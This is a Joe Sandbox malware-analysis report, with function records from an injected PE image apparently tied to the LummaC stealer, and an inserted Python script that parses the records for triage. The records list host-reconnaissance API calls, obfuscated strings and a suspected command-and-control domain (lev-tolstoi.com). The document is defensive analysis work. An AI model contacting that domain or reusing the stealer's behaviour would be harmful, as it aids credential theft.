                                                                                                                                                                                                                                                          • Opcode ID: 7cf914e994c1d43a5ad869bc00fbdd8a30e72d999c25ec1797e9f8145f45b8fd
                                                                                                                                                                                                                                                          • Instruction ID: de807461c8146aa5c2ca4a7867b47f0d9f0c6b40113fcb14a59165e0f2bfc41e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7cf914e994c1d43a5ad869bc00fbdd8a30e72d999c25ec1797e9f8145f45b8fd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED412638258300ABE714DF54DC81BBBB3A6EBC5314F19542EE2859B3A0D679AC319B09

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004086E2
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004086E8
                                                                                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004086F9
                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 004087BA
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 004087F9
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
• String ID:
• API String ID: 4063528623-0
• Opcode ID: 25297c4e6d31d418d84edee6cd033a4f8f22fc1c227bdeb32d9657ac67d9222f
• Instruction ID: 2ce280b1cfb3896d9c47e6bfffc2885025d21bcec38fee026491e5ccd9a28d87
• Opcode Fuzzy Hash: 25297c4e6d31d418d84edee6cd033a4f8f22fc1c227bdeb32d9657ac67d9222f
• Instruction Fuzzy Hash: AA2157B5E002005BD714BB25DE0B7AA36929FC6715F19853EF481FB3EADE7D4801829E

Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: Uninitialize
• String ID: >$&j=$lev-tolstoi.com
• API String ID: 3861434553-369662323
• Opcode ID: 3d28a1f1a15885d9d52034b46abf3598a3a277188b4e8ec1b803c36980448f93
• Instruction ID: 1fb7841e1e2579a847afcb15edb254a2e2fdfe5f13ac9abd7e0cca66af938fd0
• Opcode Fuzzy Hash: 3d28a1f1a15885d9d52034b46abf3598a3a277188b4e8ec1b803c36980448f93
• Instruction Fuzzy Hash: E6A1EE7150D3928BD3348F2AD4947ABBBE1AFD2300F28996DC4D96B3A1D7390419CB96
APIs
• GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042C98B
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: 138642e3b029cd67481014b7a1c73e129986cda9bd7b72bccbddae5cfeb5dc20
• Instruction ID: 277084f53d57a87b5b2b20f77d7380db257985fd3cb1fd9ab0cb610f189f46a1
• Opcode Fuzzy Hash: 138642e3b029cd67481014b7a1c73e129986cda9bd7b72bccbddae5cfeb5dc20
• Instruction Fuzzy Hash: FE21D0752193918AD3358F25C8593EBB7E1EFD6300F68486EC4C9CB291DB7480498B55
APIs
• GetUserDefaultUILanguage.KERNELBASE ref: 00436B5E
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: DefaultLanguageUser
• String ID:
• API String ID: 95929093-0
• Opcode ID: 31306f98e230910a5fd7d7977191c2fec37472a6c1007d9d0bebbc925698677f
• Instruction ID: cdf554ddc886994256fa701720874313e26cc57f0015e9f664b6f87ea11e118c
• Opcode Fuzzy Hash: 31306f98e230910a5fd7d7977191c2fec37472a6c1007d9d0bebbc925698677f
• Instruction Fuzzy Hash: BB11E472B112158BD718CB68CD526EEA7F3AFDD300F2AD07EC449D7298DA3C4A458A15
APIs
• RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B4B0,00000000,00000001), ref: 0043CCF2
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: f74496de956946dffa7b91c889c0a81754d677ad04bfa79f72b50fce16be8890
• Instruction ID: 3e35ca9de78357d80fd4bacc6a075dc7f03e91ea1ec4ff9afb29cf567c24048d
• Opcode Fuzzy Hash: f74496de956946dffa7b91c889c0a81754d677ad04bfa79f72b50fce16be8890
• Instruction Fuzzy Hash: 8EE02B72404211EBC6512F267C06B5F3B68EF8B764F06183AF800A2162DB39F811C2DE
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CC25
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
• Opcode ID: 285b51be9f12c006e86ee7f8c2a2ec48db26b0aafef5a544261be67158f7b437
• Instruction ID: c1ba3966c5ebc0bb1aa72e15ac49d3ddb4e269f0deaef98e892af36381d0cc8b
• Opcode Fuzzy Hash: 285b51be9f12c006e86ee7f8c2a2ec48db26b0aafef5a544261be67158f7b437
• Instruction Fuzzy Hash: 6AE0D87A7E0A043AF25C4629DD37F545153A7C1B12F38C36CB3122D2DCC5B4A4028108
APIs
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
• Opcode ID: 9296605408a4aa8f42ffeadd4301eca10fa856db4b8f8b03f33fe2ee125ce19c
• Instruction ID: dd30eb0f9bedd3f719cd28822517c03636a8239ffc1cd416ab20bf3b2583c864
• Opcode Fuzzy Hash: 9296605408a4aa8f42ffeadd4301eca10fa856db4b8f8b03f33fe2ee125ce19c
• Instruction Fuzzy Hash: E1F06D745097029FD314DF64D5A871ABBF1FB85304F50881DE4958B7A0C7B6A549CF82
APIs
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: BlanketProxy
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3890896728-0
                                                                                                                                                                                                                                                          • Opcode ID: a1bf64a6e68641f34fd65572d82cba1ace6207dc8bbbf3c2df9395e530bc443d
                                                                                                                                                                                                                                                          • Instruction ID: 4c45bf1f3b2393cf066d11d4a873c6d75db077c42eb8bc10690dc6e6087ea188
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1bf64a6e68641f34fd65572d82cba1ace6207dc8bbbf3c2df9395e530bc443d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DF0B2B46083029FE314EF29C5A871BBBE4AFC5304F11891CE4958B290CBB99949CF82
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0043CE9A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ForegroundWindow
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2020703349-0
                                                                                                                                                                                                                                                          • Opcode ID: 50d67614470f5ac9744d5140c2bd38d875ead9fb31099f94075d403dcd0e0617
                                                                                                                                                                                                                                                          • Instruction ID: ac7b53e1434bc05ab928a2aff0f00397df47a67b60f94d82b014c2efecf6ae2b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50d67614470f5ac9744d5140c2bd38d875ead9fb31099f94075d403dcd0e0617
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CE086BD9042429FC700DF14EC458653364EB1A315704443EE142C3372DA36D903DE08
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CBF3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                                                                                                                          • Opcode ID: 21bc0f035acf462b5611160d03c5ac7039f62254e978f2f1d5e313e4c4f2944d
                                                                                                                                                                                                                                                          • Instruction ID: 276ef5dfe185dc0c3bd898d983644633ece5b914e2c36080a16977790bdaa27c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21bc0f035acf462b5611160d03c5ac7039f62254e978f2f1d5e313e4c4f2944d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94D0A7345D01447BE344A75CEC07F22375C9793716F900235F662D65E1D9906910D6BD
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?,004121FC), ref: 0043B1BE
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                                                          • Opcode ID: 764c5e292d854dffb3dce8f316635c8f35a8183dcbb4b133c646b31cf2cd0cc2
                                                                                                                                                                                                                                                          • Instruction ID: c647758476c43136972f23f3513579106d4cce35488911c36db9c9bf482454e3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 764c5e292d854dffb3dce8f316635c8f35a8183dcbb4b133c646b31cf2cd0cc2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37D01231405523EBC7101F19FC06B8A3A94DF0A321F430865B4046B0B1C664EC9086D8
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000,00408749,?,00408749), ref: 0043B190
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: f1ba20e54d5aeeddf63a642a1b492bef5fac5cb591cb86e8b73edcf7f871e8f5
                                                                                                                                                                                                                                                          • Instruction ID: bd46a91a5c1b4e186f451d2a3caef90eea8ed5143fba280766b224e500ec41e2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1ba20e54d5aeeddf63a642a1b492bef5fac5cb591cb86e8b73edcf7f871e8f5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31C09B31045121EBC6502F16FC05FC63F54EF55355F051455B404670F1C760EC41CADC
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00423D59
                                                                                                                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00423D99
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                          • String ID: 9$&Kt0$45$<$>>$AQ$PR$Vq$Vq$XH$Ys$\\$_p$bo$ef$mm$rl$wY$|i$|s
                                                                                                                                                                                                                                                          • API String ID: 237503144-3538275056
                                                                                                                                                                                                                                                          • Opcode ID: b014b7a59d3951637f34667f59e36019c610bbfdd2af91bae6bf5bf410971a01
                                                                                                                                                                                                                                                          • Instruction ID: 1666b33dfea27814c8a335e8a4f19e8460577b272b6aed58dd039adecd7a2ec5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b014b7a59d3951637f34667f59e36019c610bbfdd2af91bae6bf5bf410971a01
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA7263B99053699BDB60DF19DC883CDBB71FB95304F108AE9C4592B390DB784A81CF86
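The function records above all share one layout (an "APIs" or "Strings" heading, bullet lines, then the Memory Dump Source, IDA Plugin, Yara and Similarity blocks with their ID lines), and a report of this size has hundreds of them. The Python below is an example added for this page, not Joe Sandbox or LummaC code: it parses that layout into structured records so call sites per API and the `$`-joined String IDs can be triaged across many functions at once. Its sample input is two records copied from this report. Reading the fourth dot-separated field of the .sdmp name as the region base is inferred from the values shown here (0000000000400000 against Offset 00400000) and is an assumption; the other name fields are kept raw.

```python
"""Parse Joe Sandbox IDA-plugin function records into structured data.

Added example for this page, not Joe Sandbox code. It expects the record
layout visible in the report: section headings ("APIs", "Strings",
"Memory Dump Source", ...) followed by bullet lines starting with "•".
"""
import re
from collections import defaultdict

# Constructed sample input: two records copied verbatim from this report.
SAMPLE = r"""APIs
• CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CBF3
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: 21bc0f035acf462b5611160d03c5ac7039f62254e978f2f1d5e313e4c4f2944d
• Instruction ID: 276ef5dfe185dc0c3bd898d983644633ece5b914e2c36080a16977790bdaa27c
• Opcode Fuzzy Hash: 21bc0f035acf462b5611160d03c5ac7039f62254e978f2f1d5e313e4c4f2944d
• Instruction Fuzzy Hash: 94D0A7345D01447BE344A75CEC07F22375C9793716F900235F662D65E1D9906910D6BD
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00423D59
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00423D99
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: EnvironmentExpandStrings
• String ID: 9$&Kt0$45$<$>>$AQ$PR$Vq$Vq$XH$Ys$\\$_p$bo$ef$mm$rl$wY$|i$|s
• API String ID: 237503144-3538275056
• Opcode ID: b014b7a59d3951637f34667f59e36019c610bbfdd2af91bae6bf5bf410971a01
• Instruction ID: 1666b33dfea27814c8a335e8a4f19e8460577b272b6aed58dd039adecd7a2ec5
• Opcode Fuzzy Hash: b014b7a59d3951637f34667f59e36019c610bbfdd2af91bae6bf5bf410971a01
• Instruction Fuzzy Hash: DA7263B99053699BDB60DF19DC883CDBB71FB95304F108AE9C4592B390DB784A81CF86
"""

HEADINGS = {"APIs", "Strings", "Memory Dump Source",
            "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}

# "• RtlFreeHeap.NTDLL(?,00000000,?,004121FC), ref: 0043B1BE"
# or, without arguments, "• GetForegroundWindow.USER32 ref: 0043CE9A"
API_LINE = re.compile(
    r"^• (?P<name>\w+)\.(?P<module>[A-Z0-9_]+)"   # API name and module
    r"(?:\((?P<args>[^)]*)\))?"                   # optional argument list
    r",? ref: (?P<ref>[0-9A-Fa-f]{8})$"           # call site in the dump
)
SOURCE_LINE = re.compile(
    r"^• Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), "
    r"based on PE: (?P<pe>true|false)$"
)
ID_LINE = re.compile(
    r"^• (?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash): ?(?P<value>.*)$"
)


def _new_record():
    return {"apis": [], "source": None, "associated": [], "ids": {}}


def parse_records(text):
    """Split report text into records; one record ends at its
    'Instruction Fuzzy Hash' line. A truncated trailing record is dropped."""
    records, current, section = [], _new_record(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADINGS:
            section = line
            continue
        m = API_LINE.match(line)
        if m and section == "APIs":
            args = m.group("args")
            current["apis"].append({
                "name": m.group("name"),
                "module": m.group("module"),
                "args": args.split(",") if args else [],
                "ref": int(m.group("ref"), 16),
            })
            continue
        m = SOURCE_LINE.match(line)
        if m:
            current["source"] = {
                "file": m.group("file"),
                "offset": int(m.group("offset"), 16),
                "pe": m.group("pe") == "true",
            }
            continue
        if line.startswith("• Associated: "):
            current["associated"].append(line[len("• Associated: "):])
            continue
        m = ID_LINE.match(line)
        if m:
            current["ids"][m.group("key")] = m.group("value").strip()
            if m.group("key") == "Instruction Fuzzy Hash":
                records.append(current)
                current = _new_record()
    return records


def api_index(records):
    """Map each API name to its sorted call-site addresses (hex strings)."""
    index = defaultdict(set)
    for rec in records:
        for call in rec["apis"]:
            index[call["name"]].add(call["ref"])
    return {name: [f"{ref:08X}" for ref in sorted(refs)]
            for name, refs in index.items()}


def string_id_tokens(record):
    """The report joins a function's referenced strings with '$'."""
    value = record["ids"].get("String ID", "")
    return value.split("$") if value else []


def dump_base(source_file):
    """Region base from the .sdmp name. Assumption inferred from this
    report: the fourth dot-separated field (0000000000400000) equals the
    record's Offset; the remaining fields are not interpreted here."""
    return int(source_file.split(".")[3], 16)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for name, refs in sorted(api_index(recs).items()):
        print(f"{name:32s} {', '.join(refs)}")
    print("strings in second record:", string_id_tokens(recs[1]))
```

Run against the whole report text rather than `SAMPLE` to list every API with its call sites in the 0x400000 image; records whose `source["pe"]` is true and whose `dump_base` equals `source["offset"]` are the ones taken from the injected PE image rather than from a scratch region.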
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID:
• String ID: 9$&Kt0$0b$45$<$>>$AQ$PR$Vq$Vq$XH$Ys$\\$_p$bo$ef$mm$rl$wY$|i$|s
• API String ID: 0-1097330926
• Opcode ID: a1f94b11949275e8069bc20abe81d2010a5b2d7f4bf8cf5f9cf8c986fdad36b1
                                                                                                                                                                                                                                                          • Instruction ID: b07e6adf7c7580e31f81f34cb8ad9f597e7046c3fe9383923d964ddd8e2be701
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1f94b11949275e8069bc20abe81d2010a5b2d7f4bf8cf5f9cf8c986fdad36b1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E7262B8D0526A9BDB60DF59DC883CDBB71FF95304F108AE9C4596B250DB380A81CF86
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 9$&Kt0$45$<$>>$AQ$PR$Vq$Vq$XH$Ys$\\$_p$bo$ef$mm$rl$wY$|i$|s
                                                                                                                                                                                                                                                          • API String ID: 0-3538275056
                                                                                                                                                                                                                                                          • Opcode ID: ff1fe25e9e673a135530696f1c2e179ad14c71c8b1183f928a20b5e979637931
                                                                                                                                                                                                                                                          • Instruction ID: c58b3c97d3732406a86a154fa40332ade82447cee3a4b8ffceeb85e0bc4811b8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff1fe25e9e673a135530696f1c2e179ad14c71c8b1183f928a20b5e979637931
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C6243B99052699BDB60DF19DC883CDBB71FFA5304F108AE9C4593B250DB384A81CF86
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "f&f$)fvf$,ZA$,f4f$21$=f!f$=f(f$Jc1t$Jc1t$Pf6f${fGf
                                                                                                                                                                                                                                                          • API String ID: 0-710588756
                                                                                                                                                                                                                                                          • Opcode ID: d5eefe01124a04aaecba9110486d758d660dffb09e16bdc73fa1e38b142bf8cb
                                                                                                                                                                                                                                                          • Instruction ID: ab1276890b7e4d60ac31e8d7f5af75c5f57bb126c4e48dcd0f14b83392fd953b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5eefe01124a04aaecba9110486d758d660dffb09e16bdc73fa1e38b142bf8cb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3742F3765083118BD724CF25C8907ABB7F1EFC9314F15892EE8C997361EB389991CB4A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: #3#3$#3=3$'3!3$*$83F3$83R3$93=3$:3 3$J3L3$O30$d3f3$i3_3$k3l3
                                                                                                                                                                                                                                                          • API String ID: 0-1612148737
                                                                                                                                                                                                                                                          • Opcode ID: 9399a7ee9c6e5426ff3ceaea5b5b42d51cd07c97ddf9252c8df36100a12064cf
                                                                                                                                                                                                                                                          • Instruction ID: d8fb8020a3cc6f2a77e7ef34e68e444773c6829ddc0a3ffcdc26604336b8212f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9399a7ee9c6e5426ff3ceaea5b5b42d51cd07c97ddf9252c8df36100a12064cf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89B126B16183208BC724DF18C85266BB7F1FFD1354F588A1DE4828F3A1E7789844CB96
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042860A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                          • String ID: J$,J^J$bJSJ$cJwJ$rJnJ$tJdJ$wJbJ
                                                                                                                                                                                                                                                          • API String ID: 237503144-492521606
                                                                                                                                                                                                                                                          • Opcode ID: 973a2b58bd6d7435bac51cb8ee912dccf8309705b16b7e8cff55539545f2cee1
                                                                                                                                                                                                                                                          • Instruction ID: dfef59bcc1acdaadf563c9da893a7df5761e8c79a35e082c28548025607413e8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 973a2b58bd6d7435bac51cb8ee912dccf8309705b16b7e8cff55539545f2cee1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54A1E2729083128BD714CF54D4506AFB3F1FFC1344F45892DE999AB350EB789945CB8A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
